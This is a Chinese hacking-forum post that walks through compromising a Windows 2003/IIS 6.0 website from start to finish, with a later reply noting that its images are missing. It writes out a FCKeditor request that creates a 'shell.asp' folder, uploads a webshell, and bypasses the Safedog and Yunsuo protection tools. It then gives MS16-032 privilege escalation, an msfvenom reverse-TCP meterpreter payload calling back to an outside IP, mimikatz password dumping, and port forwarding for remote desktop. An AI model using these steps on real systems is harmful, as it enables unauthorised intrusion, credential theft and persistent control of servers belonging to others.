找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2131|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 Y+ \5 G" @% T w; N; y4 ^

& M+ l" C& M1 n$ l% X) [$ ?( v; ^% W+ M# t" p/ v4 m. X. I( B; F# s1 k% \4 s1 K/ c' o& {' V; H: v" c' S; Y% s) n+ s4 j) n5 L# t7 `( s1 |$ g$ Y- p9 F# p
4 F2 p* y) o+ }. H+ v

0 K& p0 C$ z4 L! q4 k, ~
3 | ` d, V7 c4 S4 o7 h# d
一、 利用getwebshell
* Y% c: c+ c1 } g( I
. M+ R8 S* z; f/ R2 O3 y
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
. u* N! l: \4 k! T5 H
2 h4 e$ [* o$ T" W1 v2 O) n222.png
4 T7 R% G2 W# K
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
2 A1 D N; W- } Q* J- ]4 f. o 333.png
% p, y5 }; K7 P$ b2 b7 [6 R' u' w
下面我们构造一个asp目录,如: ) x6 }) N# r6 V4 W

$ x* J0 ]3 u8 P5 M% |. d

0 `3 ]- C( K) p http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 , L2 |* Z) S- c8 \9 P+ i

1 W2 k% v$ t T' S v9 g

4 b; V7 Z: [4 u- }" d& n8 | 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
: q2 O* z5 X% B. x
4 i, t d) M3 G9 s( J, H: Y
一、 绕过安全狗云锁提权并且加账号
8 s4 X7 U2 h p) g444.png
# K# i: [# J4 b: m+ C9 [
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
6 O0 O1 V! h7 w6 y8 {
/ V$ p+ m' {! B: R: ?
如图:
, M9 z; G/ x9 }; E7 Z" O555.png
8 F9 o, d# `- q" B( B& J1 J; A$ i
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
% o( F6 f3 r4 j' U7 j" m+ W+ Y! t
4 [$ J$ Q/ g f. r6 g( }4 r
一、 利用metasploit
6 S& q. S2 r8 c" i: u7 ^
. I, t- S D) S& ~0 T4 s9 B
首先用pentestbox生成一个64位的payload如下命令
! B& o0 h) V0 q A/ O" h1 @
5 o5 p: x$ [8 ] msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
4 l- E( L: }, v$ T: G3 e$ }
9 L. G# p$ k: [
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
% r1 u5 d$ i. {6 Y. t* E 11.png
7 }5 b7 f' y% o n: y5 _; E
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
4 Q- K) s D/ v# @ 13.png
* O: c. O- b8 b- S& _
下面我们来做一个监听如下命令:
/ a F/ k. X, g4 i
( r1 X5 e, u9 L; Sportfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
4 b$ H# e5 G. O) T" f/ U) g7 M/ t18.png
- j: q3 J% ^+ ^! @8 c' t$ W$ P8 Y

3 j" M4 u, V8 l/ g' o5 D/ d
7 Y3 e$ ^6 L0 S

- Q5 U* ?8 q4 [9 g' I

7 k! ^& i1 c. W) B$ X; @4 l7 L
( e8 t% m" `1 ]% m% ]
1 Z# A2 a2 Z* Z, ]) Y! v. h, E
1 q9 H9 ^; s0 b5 S5 B

K8 F" {3 l5 f$ X% ~9 G' F
' T# x$ |0 f7 i) Z* ?1 ]3 B+ f * d0 r! L0 Z. D% K

# K. w9 ?" r( V( _. n
2 J! q- N& h- T$ j

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表